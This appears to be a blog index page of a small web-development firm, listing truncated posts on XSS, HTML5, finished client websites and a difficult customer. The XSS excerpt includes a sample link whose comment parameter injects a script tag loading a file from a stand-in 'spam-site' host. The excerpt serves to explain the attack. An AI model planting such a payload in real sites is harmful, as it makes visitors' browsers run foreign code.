What is XSS exploits ?

This is called cross site scripting (XSS) attacks. How peoples exploits just using input fields which generally provided on the site. <A HREF=”http://sitename.com/comment.cmi? mycomment=<SCRIPT SRC=’http://spam-site/badfile’></SCRIPT>”> Click here</A> There might be …

Mozilla gearing up for html5

I have seen that many customers are willing to manage their websites with new technologies. But what about draft and many recommondation provided by w3c ? guyes. if you really …

Recently Completed One more work

Requirement : Need to handle all backend related queries. and provide admin part. Delivered : Recently completed one web site www.easyweightlosspill.com Though site is designed by other company. but its …

Property Web site is live today

We have completed successfully completed. One web site for domain www.reliableconsultants.biz . Whole website is created with admin panel where all properties are managed by admin. Whatever properties are uploaded …


This is one project where technoloiges are used ajax. and many features which belongs google mapping. and use of pdf file creation. Lets have a look at the images for …

Headache and Time consumption.

Recently I have one experience with one customer. Customer given me psd file. I have created one application relative to psd file. like center part of the image need to …